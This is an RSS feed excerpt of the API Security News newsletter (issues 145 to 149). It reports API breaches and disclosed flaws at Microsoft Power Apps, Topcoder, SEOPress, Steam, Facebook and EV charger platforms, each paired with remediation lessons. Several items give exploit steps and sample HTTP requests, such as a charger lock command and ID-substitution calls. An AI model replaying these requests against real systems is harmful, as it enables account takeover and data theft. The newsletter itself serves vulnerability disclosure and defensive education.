<p>To wrap up this week, we have an <a href="https://threatpost.com/top-3-api-vulnerabilities-cyberattackers/169048/" target="_blank" rel="noopener noreferrer">interview</a> with Jason Kent, hacker-in-residence at Cequence, courtesy of Threat Post. He suggests that the root cause of insecure APIs is the same fundamental issue that has plagued web applications for decades: lack of input validation.</p>
<p>Kent&#8217;s experience reveals his top three API vulnerability classes:</p>
<ul>
<li>Broken Object Level Authentication (BOLA/IDOR) aka <a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization" target="_blank" rel="noopener noreferrer">API1:2019</a>: Attackers substitute the ID of their own resource in the API call with an ID of a resource belonging to another user. The lack of proper authorization checks allows attackers to access the specified resource. This attack vector features regularly in this newsletter, a recent high-profile case being the <a href="https://apisecurity.io/issue-133-vulnerable-peloton-apis-api-contract-generation-net/" target="_blank" rel="noopener noreferrer">Peloton API breach</a> (and this week&#8217;s Bumble).</li>
<li>Broken User Authentication aka <a href="https://apisecurity.io/encyclopedia/content/owasp/api2-broken-authentication" target="_blank" rel="noopener noreferrer">API2:2019</a>:  Poorly implemented API authentication allows attackers to assume other users’ identities.</li>
<li>Improper Assets Management aka <a href="https://apisecurity.io/encyclopedia/content/owasp/api9-improper-assets-management" target="_blank" rel="noopener noreferrer">API9:2019</a>: This API flaw results from &#8220;insufficient environment segregation and management&#8221;, allowing attackers to access under-secured API endpoints. This was discussed earlier in the Zero Trust article — assume all APIs are external facing and secure them adequately.</li>
</ul>
<p>He recommends organizations start with a training initiative to ensure developers tasked with writing APIs are adequately skilled and aware of the risks. Focusing on the OWASP API Security Top 10 is usually the best place to begin.</p>
<p>The post <a href="https://apisecurity.io/issue-148-microsoft-power-apps-breach-bola-topcoder-portal-rfc-9101-released-api-hacking-guide-2/">Issue 149: Vulnerabilities on Cisco routers and Bumble, adopting Zero Trust for APIs, a hacker&#8217;s view on API security challenges</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 148: Microsoft Power Apps breach, BOLA on Topcoder portal, RFC 9101 released, API hacking guide</title>
		<link>https://apisecurity.io/issue-148-microsoft-power-apps-breach-bola-topcoder-portal-rfc-9101-released-api-hacking-guide/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 25 Aug 2021 18:30:21 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=8447</guid>

					<description><![CDATA[<p>This week, we have Microsoft Power Apps demonstrating the dangers of lax default settings for data exposure, yet another Broken Object Level Authorization (BOLA/IDOR) vulnerability on the Topcoder portal, the newly release RFC 9101, and a guide to hacking APIs. Breach: Microsoft Power Apps records leaked via OData API The big news this week is [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-148-microsoft-power-apps-breach-bola-topcoder-portal-rfc-9101-released-api-hacking-guide/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-148-microsoft-power-apps-breach-bola-topcoder-portal-rfc-9101-released-api-hacking-guide/">Issue 148: Microsoft Power Apps breach, BOLA on Topcoder portal, RFC 9101 released, API hacking guide</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have Microsoft Power Apps demonstrating the dangers of lax default settings for data exposure, yet another Broken Object Level Authorization (BOLA/IDOR) vulnerability on the Topcoder portal, the newly release RFC 9101, and a guide to hacking APIs.</p>
<h2>Breach: Microsoft Power Apps records leaked via OData API</h2>
<p>The big news this week is the data breach at the Microsoft Power Apps platform, leading to the disclosure of up to 38 million records with Personally Identifiable Information (PII). The details range from names and email addresses to COVID-19 vaccination status, and even Social Security numbers. The breach was discovered by researchers at UpGuard, who detail the underlying issue, the entities impacted, and the response from Microsoft in their <a href="https://www.upguard.com/breaches/power-apps" target="_blank" rel="noopener noreferrer">recent blog</a>.</p>
<p>Researchers discovered that an <a href="https://www.odata.org/" target="_blank" rel="noopener noreferrer">OData</a> API that Power Apps used for accessing data publicly exposed sensitive user data which should have been private. The access to data is controlled with the setting called table permissions, which can be set to restrict access to sensitive records. Unfortunately, Microsoft had opted to switch off table permissions by default, meaning that they were publicly accessible unless users realized to switch it on. Microsoft did warn users on the impact of leaving this setting off, but as the breach shows, this might not have been the best call:</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-8449 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/08/Article1_OData.jpg" alt="" width="749" height="268" /></p>
<p>Upon their discovery, UpGuard notified Microsoft about the issue. The initial response was that this public accessibility was <em>by design</em>, not a vulnerability. Not the first time we see this excuse with reported API vulnerabilities, often <a href="https://apisecurity.io/issue-51-gartner-releases-full-report-api-security/" target="_blank" rel="noopener noreferrer">dressed up in the guise of &#8220;improved user experience&#8221;</a>.</p>
<p>UpGuard then proceeded to notify the impacted entities, many of whom took swift action to remove the leaked PII data. To add insult to injury, many core Microsoft portals were also affected, and subsequently Microsoft appears to have notified impacted government cloud customers of the issue.</p>
<p style="text-align: left;">Since the disclosure of the breach, Microsoft has changed their stance here:</p>
<ul>
<li>They have changed the default setting so that new lists enforce table permissions to protect underlying data.</li>
<li>They have provided a dedicated tool, <a href="https://docs.microsoft.com/en-us/powerapps/maker/portals/admin/portal-checker-analysis" target="_blank" rel="noopener noreferrer">Portal Checker</a>, for finding OData lists that allow anonymous access.</li>
</ul>
<p>The lessons learned here include:</p>
<ul>
<li>This is a classic example of <a href="https://apisecurity.io/encyclopedia/content/owasp/api2-broken-authentication" target="_blank" rel="noopener noreferrer">Broken Authentication</a> on an API — the impact of having unauthenticated APIs can lead to unintended data disclosure. You could also argue that this falls under <a href="https://apisecurity.io/encyclopedia/content/owasp/api7-security-misconfiguration" target="_blank" rel="noopener noreferrer">API7:2019 — Security misconfiguration</a>, too.</li>
<li>As a developer, always ensure you understand the full impact of your chosen default settings and permissions.</li>
<li>As a platform designer providing API service, always ensure strict access restriction (deny-by-default, least privilege&#8230;). Allowing full anonymous access to data or other resources is not a sensible default, regardless of any warnings that you glue on top.</li>
</ul>
<p>We&#8217;ve previously discussed Microsoft Power Apps causing problems in our issue <a href="https://apisecurity.io/issue-138-vulnerabilities-microsoft-teams-instagram/" target="_blank" rel="noopener noreferrer">138</a>.</p>
<h2>Vulnerability: BOLA discovered in Topcoder portal</h2>
<p>In other vulnerability news this week,  we have the <a href="https://infosecwriteups.com/what-is-bola-3-digit-bounty-from-topcoder-a25e7fae0d64" target="_blank" rel="noopener noreferrer">write-up</a> and <a href="https://hackerone.com/reports/1073420" target="_blank" rel="noopener noreferrer">vulnerability disclosure</a> (scoring a bounty for the researcher) on a BOLA vulnerability in Topcoder, a crowdsourcing company with a community of designers, developers, data scientists, and programmers.</p>
<p>BOLA is <a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization" target="_blank" rel="noopener noreferrer">the number one issue on the OWASP API Security Top 10</a>. Poorly implemented access control allows an attacker to assume the identities of victims and access resources belonging to them by manipulating the object identifier.</p>
<p><img loading="lazy" decoding="async" class="wp-image-8452 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/08/Article2_BOLA.jpg" alt="" width="523" height="392" /></p>
<p>The researcher describes the exploit as follows:</p>
<ol>
<li>Create an account on Topcoder.</li>
<li>Observe how the property for user IDs — often the likely candidate to modify when looking for vulnerabilities — is used.</li>
<li>Enumerate subdomains and confirm the presence of the same user ID.</li>
<li>Locate a request (here a <code>POST</code>) without an <code>Authorization</code> header .</li>
<li>Replace the user ID with the user ID of another account to get access to the victim&#8217;s data.</li>
</ol>
<p>The lessons learned with this one:</p>
<ul>
<li>BOLA is the leading cause of API vulnerability and is often relatively easily exploited, as in this disclosure, so keep your eyes peeled for it.</li>
<li>API designers need to ensure that all API endpoints are adequately protected with authorization controls. In this instance, a single unprotected API endpoint was all that was necessary to expose user PII.</li>
</ul>
<h2>Standards: RFC 9101 released</h2>
<p>This week also <a href="https://self-issued.info/?p=2182" target="_blank" rel="noopener noreferrer">saw the publication</a> of the OAuth 2.0 JWT-Secured Authorization Request (JAR) specification as <a href="https://www.rfc-editor.org/rfc/rfc9101" target="_blank" rel="noopener noreferrer">RFC 9101</a>. This is another one in the series of RFCs bringing OpenID Connect-defined functionality to OAuth 2.0.</p>
<p>OAuth 2.0  and OpenID Connect are currently considered the most secure methods of authentication and authorization in API security. It comes therefore as no surprise that among other applications, this specification is also used by the OpenID Financial-grade API (FAPI).</p>
<p>&nbsp;</p>
<p><img loading="lazy" decoding="async" class="wp-image-8454 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/08/Article3_OpenID.png" alt="" width="530" height="199" /></p>
<h2>Tutorial: API hacking guide</h2>
<p>Tutorials are always welcome. Luke Stephens (aka hakluke) and Farah Hawaa have teamed up to create <a href="https://labs.detectify.com/2021/08/10/how-to-hack-apis-in-2021/" target="_blank" rel="noopener noreferrer">a guide on how to hack APIs in 2021</a>.</p>
<p>The guide provides an excellent (and humorous) foundation into the growing need for considering API security right from the start. The advent of Single Page Applications (SPA) driving the proliferation of backend APIs is one important drive for this.</p>
<p><img loading="lazy" decoding="async" class="wp-image-8456 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/08/Article3.jpg" alt="" width="632" height="147" /></p>
<p>The guide covers, for example:</p>
<ul>
<li>The tools used (primarily PostMan)</li>
<li>The common configuration and use of these tools</li>
<li>A wide range of API vulnerabilities, with great explanations and sample code snippets and URLs.</li>
</ul>
<p>Of particular use for players on the defender side are the remediation guides, offering clear and actionable advice for protecting APIs.</p>
<p>Highly recommended for both red and blue teams alike (or whatever color your jersey might be)!</p>
<p>The post <a href="https://apisecurity.io/issue-148-microsoft-power-apps-breach-bola-topcoder-portal-rfc-9101-released-api-hacking-guide/">Issue 148: Microsoft Power Apps breach, BOLA on Topcoder portal, RFC 9101 released, API hacking guide</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 147: Vulnerabilities in SEOPress plugin and Steam portal, results from an application security survey</title>
		<link>https://apisecurity.io/issue-147-vulnerabilities-in-seopress-plugin-and-steam-portal-results-from-an-application-security-survey/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 18 Aug 2021 22:00:56 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=8400</guid>

					<description><![CDATA[<p>This week, we have the recent API vulnerabilities in the SEOPress WordPress plugin and the Valve Software Steam portal, the results from a Dark Reading survey into application security, and details of the upcoming OpenAPI Initiative’s (OAI) API Specifications Conference. Vulnerability: XSS and REST API vulnerability in SEOPress On July 29, 2021, the Wordfence Threat [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-147-vulnerabilities-in-seopress-plugin-and-steam-portal-results-from-an-application-security-survey/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-147-vulnerabilities-in-seopress-plugin-and-steam-portal-results-from-an-application-security-survey/">Issue 147: Vulnerabilities in SEOPress plugin and Steam portal, results from an application security survey</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have the recent API vulnerabilities in the SEOPress WordPress plugin and the Valve Software Steam portal, the results from a Dark Reading survey into application security, and details of the upcoming OpenAPI Initiative’s (OAI) API Specifications Conference.</p>
<h2>Vulnerability: XSS and REST API vulnerability in SEOPress</h2>
<p class="line-numbers">On July 29, 2021, the Wordfence Threat Intelligence team <a href="https://www.wordfence.com/blog/2021/08/xss-vulnerability-patched-in-seopress-affects-100000-sites/" target="_blank" rel="noopener noreferrer">initiated the responsible disclosure process</a> for a vulnerability that they discovered in <a href="https://wordpress.org/plugins/wp-seopress/" target="_blank" rel="noopener noreferrer">SEOPress</a>, a WordPress plugin installed on over 100 000 sites.</p>
<p>The researchers found that a REST API endpoint that the SEOPress plugin exposed for adding metadata to a post also allowed injecting arbitrary HTML payloads into the SEO fields of WordPress posts. This potentially left the door open for performing <a href="https://en.wikipedia.org/wiki/Cross-site_scripting" target="_blank" rel="noopener noreferrer">Cross-Site Scripting</a> (XSS) based attacks, such as various administrative tasks, web shell injections, arbitrary redirects, and even a complete site takeover. The vulnerability is registered as <a href="https://nvd.nist.gov/vuln/detail/CVE-2021-34641" target="_blank" rel="noopener noreferrer">CVE-2021-34641</a> and is currently waiting for classification.</p>
<p>The issue boils down to the fact that the implementation of the API endpoint did not fully validate the request for relevant permissions. Instead, the <code class="language-markup">permission_callback</code> method handler only validated the presence of a <code>nonce</code> that any authenticated user on a WordPress site can easily generate:</p>
<pre class="line-numbers"><code class="language-php">'permission_callback' =&gt; function ($request) {
$nonce = $request-&gt;get_header('x-wp-nonce');
if ( ! wp_verify_nonce($nonce, 'wp_rest'))
{
    return false;
}
return true;</code></pre>
<p class="line-numbers">The vendor was notified of the vulnerability, and they have released a patch in version 5.0.4. Lessons learned here:</p>
<ul>
<li>Failure to fully validate API requests is a leading factor in vulnerable APIs. Authentication is not enough and authorization needs to be in place. In this particular case, we saw an example of <a href="https://apisecurity.io/encyclopedia/content/owasp/api5-broken-function-level-authorization" target="_blank" rel="noopener noreferrer">OWASP API:5 Broken Function-Level Authorization</a>.</li>
<li>Skilled attackers can combine vulnerabilities,  like an API vulnerability and a cross-site scripting vulnerability, to totally compromise the target system. Define, validate, sanitize API inputs to prevent malicious payloads.</li>
</ul>
<h2>Vulnerability: Valve Software fixes API vulnerability in Steam portal</h2>
<p><a href="https://hackerone.com/reports/1295844" target="_blank" rel="noopener noreferrer">A security researcher found an API vulnerability in Steam Wallet API</a> — part of the popular Steam portal by Valve Software — that generated quite literally money for nothing.</p>
<p>The researcher created an account on the Steam platform and then examined transactions made to the secure Smart2Pay API endpoint <code>[https:]//globalapi.smart2pay.com/</code>. He wondered if he could add money to his account by forging the corresponding parameter in the payload. The payload was protected with a hash. However, the construction of the <code>POST</code> request body revealed a flaw in how a transaction hash was calculated: the calculation appeared to be eliminating special separator characters like <code>&amp;</code> and <code>=</code>.</p>
<p>The amount of the payment was included in the <code>amount</code> parameter of the request, as was the customer email. Thus, from hashing perspective, <code>amount = 100</code> (as a parameter) and <code>amount100</code> as a substring in another parameter (for example, the email address of the user) would generate the same hash.</p>
<p>The researcher made a request using the crafted email address and modified the request body to inject separators into the email address, thus forcing the transaction hashing to add additional <code>amount</code> fields to the request.</p>
<p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-8407" src="https://apisecurity.io/wp-content/uploads/2021/08/Screenshot_1295844.png" alt="" width="1054" height="286" /></p>
<p>This vulnerability allowed a user with a Steam account to transfer arbitrary amounts to their Steam Wallet by a relatively trivial <code>POST</code> request modification. Valve Software confirmed the vulnerability and has fixed the issue. The vulnerability was disclosed on HackerOne, and the researcher was rewarded with a bounty (this time not money for nothing).</p>
<p>Lessons learned here:</p>
<ul>
<li>User inputs cannot be trusted. Valve did a good job adding payload signing with a hashing function but the function was vulnerable and could be exploited.</li>
<li>To that point, it is also recommended that you thoroughly describe all payload schemas (including patterns for all strings) and enforce them.</li>
<li>This example also demonstrates the business value of a well-run bug bounty program: for the outlay of a $7500 bounty, Valve Software was able to identify a vulnerability that could have resulted in financial loss of several orders of magnitude.</li>
</ul>
<h2>Survey: Dark Reading on application security</h2>
<p>The recent Dark Reading survey <a href="https://www.darkreading.com/edge-threat-monitor/enterprises-focus-more-on-api-security-on-heels-of-increased-data-integration" target="_blank" rel="noopener noreferrer">&#8220;Secure Applications&#8221;</a> indicated that organizations are increasingly paying attention to the security of their APIs in their software security initiatives. As many as 41% said they were treating API security as part of their application security program and 23% have a dedicated API Security process.</p>
<p>Other key takeaways from the survey include:</p>
<ul>
<li>18% of organizations are outsourcing the evaluation of their API security to 3rd party or SaaS providers (up from 5% in 2020)</li>
<li>As many as 18% of organizations do not have any specific API security activity (unchanged from 2020)</li>
</ul>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-8411" src="https://apisecurity.io/wp-content/uploads/2021/08/tm-20210813.png" alt="" width="692" height="345" /></p>
<h2>Conference: OAI’s API Specifications Conference on 28—29 September, 2021</h2>
<p>OAI’s <a href="https://events.linuxfoundation.org/openapi-asc/" target="_blank" rel="noopener noreferrer">API Specifications Conference</a> (ASC) is a place for API practitioners to come together and discuss the evolution of API technology. ASC includes cutting-edge technology keynotes and sessions that chart the future of APIs with in-depth specification and standards discussions.</p>
<p>The OpenAPI Specification (OAS), RAML, Blueprint, gRPC, OData, JSON Schema, GraphQL, AsyncAPI, and other formats will all be topics at the event, enabling attendees to get familiar with these formats and discuss how to use them in practice.</p>
<p>Of interest to security practitioners will be the talk from <a href="https://apispecs21.sched.com/speaker/isabelle_mauny.1wzdok46" target="_blank" rel="noopener noreferrer">Isabelle Mauny</a>, co-founder and Field CTO of 42Crunch, <a href="https://apispecs21.sched.com/event/lMNi" target="_blank" rel="noopener noreferrer">discussing how to inject security into API development</a>.</p>
<p>Like other conferences at the present, ASC will be virtual, so you can participate from wherever you are.</p>
<p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-8409" src="https://apisecurity.io/wp-content/uploads/2021/08/Screenshot_2021-08-18-10.45.27_CJ1ih4.png" alt="" width="1164" height="241" /></p>
<p>The post <a href="https://apisecurity.io/issue-147-vulnerabilities-in-seopress-plugin-and-steam-portal-results-from-an-application-security-survey/">Issue 147: Vulnerabilities in SEOPress plugin and Steam portal, results from an application security survey</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 146: Facebook API leaking private group membership, JWT Attacker plugin for Burp</title>
		<link>https://apisecurity.io/issue-146-facebook-api-leaking-private-group-membership-jwt-attacker-plugin-burp/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 11 Aug 2021 22:00:28 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=8371</guid>

					<description><![CDATA[<p>This week, we have the recent API fix involving group membership at Facebook, a case study of a BOLA vulnerability leaking users&#8217; credit coupons, a handy add-on for Burp Suite, plus an interview with a security expert on API security. Vulnerability: Facebook Facebook API was leaking information on users&#8217; memberships in private groups. Muhammad Sholikhin [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-146-facebook-api-leaking-private-group-membership-jwt-attacker-plugin-burp/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-146-facebook-api-leaking-private-group-membership-jwt-attacker-plugin-burp/">Issue 146: Facebook API leaking private group membership, JWT Attacker plugin for Burp</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have the recent API fix involving group membership at Facebook, a case study of a BOLA vulnerability leaking users&#8217; credit coupons, a handy add-on for Burp Suite, plus an interview with a security expert on API security.</p>
<h2>Vulnerability: Facebook</h2>
<p>Facebook API was leaking information on users&#8217; memberships in private groups. <a href="https://medium.com/@muhammadsholikhin/facebook-vulnerability-expose-group-member-3000-cca809a53f6b" target="_blank" rel="noopener noreferrer">Muhammad Sholikhin found that he could verify if someone was a member of a private Facebook group</a>, as long as the attacker and the victim were connected (friends) in Facebook. Membership information on private Facebook groups is not supposed to be visible to anyone outside the group.</p>
<p>Sholikhin found that an attacker could switch group and user IDs in a valid join request and deduce from the API response if someone was a member in the group in question:</p>
<ol>
<li>The attacker makes a request to join a group and observes the API call: <code>POST /a/group/?gid=GROUP_ID&amp;aid=USER_ID&amp;refid=18</code></li>
<li>The attacker changes IDs in the request to the user ID of the victim and the group ID of the target group and sends a new request to join the new target group as the victim.</li>
<li>If the victim was not a member of the group, the API returned a permission error:
<pre class="line-numbers"><code class="language-http">{“__ar”:1,”error”:1376045,”errorSummary”:”Cannot add member”,”errorDescription”:”You need to be an admin or a moderator of the group, or a friend of this person, to add them as a member.”,”payload”:null,”bootloadable”:{},”ixData”:{},”bxData”:{},”gkxData”:{},”qexData”:{},”lid”:”"}</code></pre>
<p>However, for someone already in the group, the API error explicitly said so:</p>
<pre class="line-numbers"><code class="language-http">{“__ar”:1,”error”:1376015,”errorSummary”:”Already a Member”,”errorDescription”:”The person you’ve just tried to add is already a member of this group.”,”payload”:null,”bootloadable”:{},”ixData”:{},”bxData”:{},”gkxData”:{},”qexData”:{},”lid”:”"}</code></pre>
</li>
</ol>
<p>Facebook has since fixed the vulnerability. Lessons learned here:</p>
<ul>
<li>Permission checks should always precede functional errors, otherwise, you risk a <a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization" target="_blank" rel="noopener noreferrer">Broken Object-Level Authorization vulnerability</a>, like in this case.</li>
<li>Sometimes API error responses communicate more information than they should. However, in this particular case, one could argue that letting a legitimate user know that the membership already exists is an appropriate response. All the more important then to make sure that the user really is legitimate.</li>
</ul>
<h2>Pentesting case study: Stealing users&#8217; credit coupons through BOLA</h2>
<p><a href="https://ja1sharma.medium.com/bugbounty-idor-how-i-was-able-to-exfiltrate-any-users-credit-coupons-49631d9f3bc8" target="_blank" rel="noopener noreferrer">Jai Sharma has posted a step-by-step write-up</a> on how he found a way to steal someone else&#8217;s credits from a system that he was pentesting.</p>
<p>While observing the API calls that the app was making, he noticed among others this <code>OPTIONS</code> call:</p>
<pre class="line-numbers"><code class="language-http">OPTIONS /api/v1/client_info?email=user@web.com&amp;external_id=00000111&amp;customer_token=7ddf32e17a6ac5ce04a8ecbf782ca509&amp;merch_id=60037</code></pre>
<p>As attackers often do, he tried different verbs and noticed that he could perform a <code>GET</code> call on that same API. That call retrieved a lot of confidential user data, including current and expired credit coupons, credit history, and so on.</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-8377 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/08/credit_coupon_information_leaking.jpg" alt="" width="800" height="384" /></p>
<p>He could even make this call for other users as long as he knew their email addresses and their <code>external_id</code> in the system, which turned out relatively easy to obtain:</p>
<ul>
<li>It was a simple 4-digit number and the API had no rate-limiting in place. Thus, attackers could enumerate all possible values.</li>
<li>In addition, the password reset call was returning <code>external_id</code> information for any user.</li>
</ul>
<p>Thus, an attacker could retrieve and use any user&#8217;s credit coupons in the system as long as they knew their victim&#8217;s email address.</p>
<p>Lessons learned in this one:</p>
<ul>
<li>Make sure that your APIs do not respond to operations that they are not supposed to implement. This happens a lot when API generators are used, or additional operations are implemented, just in case.</li>
<li>Make sure your APIs have both authentication and authorization in place.</li>
<li>Do not use sequential IDs. Generate long random identifiers, such as GUIDs, to prevent enumeration.</li>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api4-lack-of-resources-and-rate-limiting" target="_blank" rel="noopener noreferrer">Apply rate limiting to your APIs</a> to prevent abuse!</li>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api3-excessive-data-exposure" target="_blank" rel="noopener noreferrer">Limit the information that your API returns</a> to the bare minimum required by the application, and enforce that limited schema on your API responses.</li>
</ul>
<h2>Tools: JWT Attacker add-on for Burp Suite</h2>
<p>JSON Web Tokens (JWT) remain one of the most frequently used authentication token formats in APIs. As such, JWT attacks are a frequent topic of this newsletter.</p>
<p>(If you need an overview of JWT and possible JWT attacks, see the <a href="https://youtu.be/M3jA0bGDCso" target="_blank" rel="noopener noreferrer">recording from my JWT security talk</a> at AppSec California 2020. Isabelle Mauny and I also did a <a href="https://youtu.be/Eq-LiFJbvXo" target="_blank" rel="noopener noreferrer">webinar on the approach to externalize JWT security checks</a>.)</p>
<p>The add-on <a href="https://portswigger.net/bappstore/82d6c60490b540369d6d5d01822bdf61" target="_blank" rel="noopener noreferrer">JSON Web Token Attacker</a> for Burp Suite helps penetration test some of the common JWT vulnerabilities. The add-on comes with the following features:</p>
<ul>
<li>Recognition and marking</li>
<li>JWS/JWE editors</li>
<li>Attacks:
<ul>
<li>Bleichenbacher MMA</li>
<li>Key confusion (changing the <code>alg</code> value)</li>
<li>Signature exclusion</li>
</ul>
</li>
<li><code>Base64url</code> encoder and decoder</li>
<li>Extensibility for new attacks</li>
</ul>
<p>If pentesting is what you do, or you are just interested, do check this one out.</p>
<h2>Opinion: EPAM CISO on API security</h2>
<p><a href="https://www.epam.com/" target="_blank" rel="noopener noreferrer">EPAM</a> is a large system integrator helping lots of enterprises implement and protect their APIs. <a href="https://securityboulevard.com/2021/08/developing-best-practices-for-api-security/" target="_blank" rel="noopener noreferrer">Security Boulevard has published an interview on API security</a> with EPAM&#8217;s Chief Information Security Officer (CISO), Sam Rehman.</p>
<p>He talks about the challenging balance that API designers have to find:</p>
<ul>
<li>Flexibility: expose as much as possible to maximize the potential usefulness and business impact.</li>
<li>Security: the larger the attack surface the API exposes, the higher the security risks.</li>
</ul>
<p>Rehman discusses the common threats that EPAM sees in the market, such as:</p>
<ul>
<li>Weak authentication and authorization</li>
<li>Impersonation and credential stuffing attacks, bots, ghost accounts</li>
<li>Smart scanners automating attacker efforts to find vulnerabilities</li>
<li>Inside-out-only perspective that limits companies to only test &#8220;happy paths&#8221; of expected API behavior</li>
<li>Device security for mobile and smart devices</li>
</ul>
<p>And on the practical side, Rehman also highlights the following API security best practices:</p>
<ul>
<li>Secure identities clearly, combine role-based access control (RBAC), and start enhancing with ABAC to fine-tune your authorization controls.</li>
<li>Have smaller and more context-driven calls, ensuring that the defense layers can be more effective against attackers and reduce the impact of attacks.</li>
<li>Consider zero-trust principles.</li>
<li>Limit the number of exposed API calls, move callers to new APIs, and actively monitor and sunset any unused calls. Developers could also do device checks, as well as binding to subsets and versions of calls when possible.</li>
<li>Review your API designs with offensive or white hat security experts to help figure out where the gaps are. When testing a function, they should complete both black and grey box testing.</li>
</ul>
<p>The post <a href="https://apisecurity.io/issue-146-facebook-api-leaking-private-group-membership-jwt-attacker-plugin-burp/">Issue 146: Facebook API leaking private group membership, JWT Attacker plugin for Burp</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 145: APIs and electric car charging stations, The Nuts and Bolts of OAuth 2.0</title>
		<link>https://apisecurity.io/issue-145-apis-electric-car-charging-stations-nuts-bolts-oauth-2-0/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 04 Aug 2021 22:00:16 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=8332</guid>

					<description><![CDATA[<p>This week, we take a look at the recently discovered (and fixed) API vulnerabilities in electric car charging stations, a Udemy course on OAuth 2.0, the recently released Gartner Hype Cycle on APIs, and how APIs in microservices architectures can be exploited if they construct backend calls without properly validating inputs. Vulnerability: Electric vehicle charging [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-145-apis-electric-car-charging-stations-nuts-bolts-oauth-2-0/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-145-apis-electric-car-charging-stations-nuts-bolts-oauth-2-0/">Issue 145: APIs and electric car charging stations, The Nuts and Bolts of OAuth 2.0</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we take a look at the recently discovered (and fixed) API vulnerabilities in electric car charging stations, a Udemy course on OAuth 2.0, the recently released Gartner Hype Cycle on APIs, and how APIs in microservices architectures can be exploited if they construct backend calls without properly validating inputs.</p>
<h2>Vulnerability: Electric vehicle charging stations</h2>
<p>Researchers at Pen Test Partners <a href="https://www.pentestpartners.com/security-blog/smart-car-chargers-plug-n-play-for-hackers/" target="_blank" rel="noopener noreferrer">looked into the security of several popular smart charging stations for electric vehicles</a>.</p>
<p>The chargers are typically controlled through a cloud platform and a mobile app, and hence have APIs that can be accessed remotely and can be vulnerable.</p>
<p>The potential exploits that Pen Test Partners found were threefold:</p>
<ul>
<li>Attackers might be able to retrieve users&#8217; personal details.</li>
<li>Attackers might be able to control the charging process for an individual car.</li>
<li>Attackers might be able to mass-control all charging stations in a country or region and use them to cause massive spikes of power consumption, affecting the national power grid.</li>
</ul>
<p>Here are some API vulnerabilities that they found:</p>
<ul>
<li><strong>Project EV / ATESS / Shenzen Growatt</strong> (the largest platform that they looked at with over 2.9 million devices):
<ul>
<li>The API call for login (<code>POST</code> on <code>/ocpp/user</code>) did not actually need a password and would let anyone in if they simply supplied the username or the serial number of the charger!</li>
<li>The serial numbers were predictable and easy to enumerate (<code>TTD0xxxxx</code>).</li>
<li>Starting or stopping a charger was a matter of sending the corresponding <code>lock</code>/<code>unlock</code> command to the <code>/ocpp/api</code> endpoint:
<pre class="line-numbers"><code class="language-http">POST /ocpp/api/ HTTP/1.1
Content-Type: application/json;charset=UTF-8
Content-Length: 64
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Redmi 8A MIUI/V11.0.3.0.PCPMIXM)
Host: charge[.]growatt[.]com
Connection: close
Accept-Encoding: gzip, deflate

{"chargeId":"TTD0xxxxx","connectorId":1,"lan":1,"cmd":"lock"}</code></pre>
</li>
</ul>
</li>
<li><strong>Wallbox</strong> had <a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization" target="_blank" rel="noopener noreferrer">Broken Object-Level Authorization (BOLA/IDOR) issues</a>, meaning that the attacker could log in with their account but then use device IDs belonging to other customers to take over their chargers:<br />
<img loading="lazy" decoding="async" class="size-full wp-image-8337 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/08/Wallbox-ev-ch-4.jpg" alt="" width="800" height="408" /></li>
</ul>
<ul>
